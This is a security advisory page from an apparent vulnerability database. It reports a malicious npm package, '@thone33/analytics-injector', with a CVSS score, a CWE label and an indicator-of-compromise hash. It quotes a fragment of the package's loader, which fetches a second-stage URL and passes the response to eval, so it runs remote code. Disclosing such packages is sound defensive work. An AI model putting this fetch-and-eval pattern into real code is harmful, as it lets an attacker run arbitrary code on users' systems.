res.text()) ...."/> res.text()) ...."/> res.text()) ...."/>
VDB

GCVE-110-OSM-2026-6926

GCVE-110-OSM-2026-6926
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published June 29, 2026
Malicious package detected. Behaviors: code execution, network activity. ENTRY index.js (main: index.js) EXFIL - Fetch and Eval/Exec in index.js: "fetch(STAGE2_URL) .then(res => res.text()) .then(data => { try { eval" ADDITIONAL FINDINGS - Dynamic Code Execution in index.js: "eval(data)" - Brand New Package - Rapid Version Publishing PAYLOAD FILES index.js INDICATORS (IOCs) - payloadFileHash: d4e051824bf47c38ca26eb48d6f7adf2fd4b87b6ec7a46d15d3988cb4fd500fc

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknown@thone33/analytics-injectorall (affected)

References

advisory
vendor

Browse GCVE Records

73,734 records in the GCVE database · Updated July 18, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›